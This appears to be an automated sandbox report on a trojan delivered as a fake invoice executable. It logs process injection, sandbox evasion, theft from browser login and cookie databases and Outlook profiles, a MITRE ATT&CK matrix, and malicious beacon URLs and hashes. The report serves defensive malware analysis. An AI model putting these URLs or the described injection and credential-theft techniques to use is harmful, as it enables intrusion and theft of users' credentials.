            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E07C3 mov eax, dword ptr fs:[00000030h]4_2_014E07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014827ED mov eax, dword ptr fs:[00000030h]4_2_014827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014827ED mov eax, dword ptr fs:[00000030h]4_2_014827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014827ED mov eax, dword ptr fs:[00000030h]4_2_014827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE7E1 mov eax, dword ptr fs:[00000030h]4_2_014EE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014647FB mov eax, dword ptr fs:[00000030h]4_2_014647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014647FB mov eax, dword ptr fs:[00000030h]4_2_014647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\fontview.exe, Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00417553 LdrLoadDll, 4_2_00417553
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Section loaded: unknown target: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Section loaded: unknown target: C:\Windows\SysWOW64\fontview.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\fontview.exe, Section loaded: unknown target: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe protection: read write
            Source: C:\Windows\SysWOW64\fontview.exe, Section loaded: unknown target: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\fontview.exe, Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\fontview.exe, Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BB6008
            Source: C:\Windows\SysWOW64\fontview.exe, Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\fontview.exe, Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\fontview.exe, Thread APC queued: target process: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe, Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe
            Source: C:\Windows\SysWOW64\fontview.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: EProgram Manager
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Queries volume information: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe VolumeInformation
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\fontview.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\fontview.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

            Remote Access Functionality

            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
            Valid Accounts | Windows Management Instrumentation | Path Interception | 512 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
            Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol |  |  | Data Encrypted for Impact | DNS Server | Email Addresses
            Local Accounts | Cron | Login Hook | Login Hook | 512 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 4 Application Layer Protocol |  |  | Data Destruction | Virtual Private Server | Employee Names
            Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels |  |  | Data Encrypted for Impact | Server | Gather Victim Network Information
            Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication |  |  | Service Stop | Botnet | Domain Properties
            External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port |  |  | Inhibit System Recovery | Web Services | DNS
            [Behavior graph. ID: 1340403. Sample: Invoice_&_SOA_ready_for_dis... Startdate: 10/11/2023. Architecture: WINDOWS. Score: 100. Process chain: Invoice_&_SOA_ready_for_dispatch.exe (started) -> RegSvcs.exe (started, two instances) -> xIXlFDyvSnsfUSfsjsGwj.exe (injected) -> fontview.exe (started) -> xIXlFDyvSnsfUSfsjsGwj.exe (injected) and firefox.exe (started).]

            Source | Detection | Scanner | Label | Link
            Invoice_&_SOA_ready_for_dispatch.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
            Invoice_&_SOA_ready_for_dispatch.exe | 100% | Avira | HEUR/AGEN.1323731 |
            Invoice_&_SOA_ready_for_dispatch.exe | 100% | Joe Sandbox ML |  |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                                                        high
                                                                                        https://www.namecheap.com/domains/registration/results/?domain=autokit.helpfontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://img.sedoparking.com/templates/bg/NameSiloLogo.pngfontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://mozilla.org0/fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://www.west.cn/ykj/view.asp?domain=633922.comfontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://crash-reports.mozilla.com/submit?id=fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.west.cn/services/webhosting/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.west.cn/services/domain/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03fontview.exe, 0000000C.00000002.3736597685.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003248000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://www.sedo.com/services/parking.php3xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ac.ecosia.org/autocomplete?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.namecheap.com/domains/registration/results/?domain=otternaut.livefontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.west.cn/jiaoyi/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://img.sedoparking.com/templates/images/hero_nc.svgfontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.jsfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1340403
Start date and time: 2023-11-10 09:26:17 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Invoice_&_SOA_ready_for_dispatch.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@14/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 119
• Number of non-executed functions: 279
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• VT rate limit hit for: Invoice_&_SOA_ready_for_dispatch.exe
Time      Type             Description
09:27:05  API Interceptor  1x Sleep call for process: Invoice_&_SOA_ready_for_dispatch.exe modified
09:27:53  API Interceptor  10343519x Sleep call for process: fontview.exe modified
                                                                                                                            WoDN7Q47dO.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.educationacielouvert.com/o6g2/?kDKXx0V=eeE/5eW3ZXGgRwI26chcqn1xSUo8zOrK/YCoGUPYT0IETauoLqCq47+7r+rjcVwi+9ed3TZq2g==&DR-DOL=ixopsp0
                                                                                                                            Mzcoqandgnyyyp.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • www.barsandbands.fun/fadc/?0tWh=L6KlLjtl0Ps0bvRVkG+aTTnpOxfwdkju7qZ7NX9I7As+Us0PL6nojt9t0r9jLRvLxHZo&J43P7=2dg8UxPHi4KTr610
                                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.13397.19541.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • www.victorviera.com/8hbu/?QRqdvJ=q52ylF0KP5a0256QpmfyCQnbPX0ERKejRXVTTgPc0lCCpyWBu/AYyYr/03JCkIgp+AvYqA5ISpDSiXnDTze++JF49RqW7vnhlSSNebzi+KvH&Mfxt=Xjktc0pP
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Windows\SysWOW64\fontview.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):196608
                                                                                                                            Entropy (8bit):1.1211596417522893
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.932532622680427
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
